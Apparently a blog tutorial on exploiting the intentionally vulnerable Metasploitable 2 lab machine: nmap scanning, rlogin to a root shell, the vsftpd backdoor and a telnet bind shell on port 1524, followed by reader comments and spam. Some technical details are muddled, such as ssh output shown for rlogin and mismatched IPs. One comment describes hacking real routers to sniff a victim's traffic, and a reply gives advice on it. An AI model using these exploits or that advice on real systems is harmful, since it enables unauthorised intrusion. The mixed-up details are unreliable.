Portscan
On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the ip of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all ports in that range, you can use Nmap scan. Here is what it should look like.nmap -sS 192.168.154.0/24
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).
Vulnerabilities
Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 2-
- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
- Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
- Weak Passwords - These are vulnerable to bruteforce attacks.
- Vulnerable Web Services- A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
- Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports which you came up across during the port scan? The 512,513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure.
root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
[-D [bind_address:]port] [-e escape_char] [-F configfile]
[-I pkcs11] [-i identity_file]
[-L [bind_address:]port:host:hostport]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-R [bind_address:]port:host:hostport] [-S ctl_path]
[-W host:port] [-w local_tun[:remote_tun]]
[user@]hostname [command]
rlogin -l root 192.168.154.132Most probably you will get something like this-
root@kali:~# rlogin -l root 192.168.154.132The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.RSA key fingerprint is *****.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.root@192.168.154.132's password:
As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rsh-client is a remote login utility that it will allow users to connect to remote machines.
apt-get install rsh-clientThis will start the installation progress, you'll have to type yes once or twice, Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better.
root@kali:~# rlogin -l root 192.168.154.132Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686The programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.To access official Ubuntu documentation, please visit:http://help.ubuntu.com/You have mail.root@metasploitable:~#
Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.
Telnet Vulnerability
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploit contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just use :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then something for your appetite-
telnet 192.168.99.131 1524This is a another one line exploit, on the 1524 ingreslock port (see portscan result). I will post more stuff soon, but this is all for now.
Hi, found something to add.
ReplyDeleteUsers need to set their VM internet connection as "VM" to scan ports. Otherwise the ifconfig will not provide correct IP.
Please elaborate. I didn't get you. Are you talking about the port-scan step?
DeleteHope it works.
DeleteHi , i have hacked some routers (TP_Link and D_Link)...so i have full-complete access
ReplyDeleteto the victim's router web interface....( my OS=Kali ) ....is there any way to sniff PC data traffic behind NAT???((except DNS Spoofing))......
Web Interface is nice but yields little. You need to gain root access if you want to get anywhere,
DeleteNice job. Thank you
ReplyDeletewhere can i find the rest of your tutorials on this?
ReplyDeletehii
ReplyDeletefirst amazing site love it
and second i cant find any ports .
my lp run kali and my pc run VM Metasploitable2
i use nmap and get this >>>>
note : host seems down , if it is really up , but blocking our ping probes , try -Pn ( i try it not working too)
nmap done : 1 IP Address ( 0 host up ) .
what i need to do ?
thanks .
you must ensure your metasploitable is up and running when scanning
DeleteYour metasploitable2 must be up and running when you are testing
ReplyDeletescanning with nmap shows all ports are filtered. what should i do?
ReplyDeleteturn off the firewall, or slow down the scan so firewall doesn't detect it. Also experiment with scan types
DeleteHi,
ReplyDeleteI followed up to the step where you download the RSH client. I am using a Kali VM and Metasploitable VM at the same time. For some reason when I try to remote login to Metasploitable now I get rlogind: Permission denied. Can you possibly help me out with this? I have been stuck for two days!
hi
ReplyDeletei am using windows 10 and i have installed metasploitable in virtual box. so how will i use metasploit in metasploitable
Follow this guide for setup your Pentest lab: https://www.hackingloops.com/kali-linux-virtualbox-pentest-lab/
DeleteI think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. GRC
ReplyDeleteLiên hệ Aivivu, đặt vé máy bay tham khảo
ReplyDeletekinh nghiệm mua vé máy bay đi Mỹ giá rẻ
mua vé máy bay từ mỹ về việt nam
mua vé máy bay từ nhật bản về việt nam
giá vé máy bay từ đức về việt nam
giá vé máy bay từ Vancouver về việt nam
vé máy bay từ hàn về Việt Nam
khách sạn cách ly ở vân đồn
A residence permit for spouses and minor children can be obtained together with the main investor. The procedure for obtaining a temporary residence permit takes 1 to 3 months. https://www.baltic-legal.com/legal-services-eng.htm
ReplyDeleteYou know your projects stand out of the herd. There is something special about them. It seems to me all of them are really brilliant! virtual assessment centre
ReplyDeleteWindows 11 Activator is one of the best activator available on filesmama.
ReplyDelete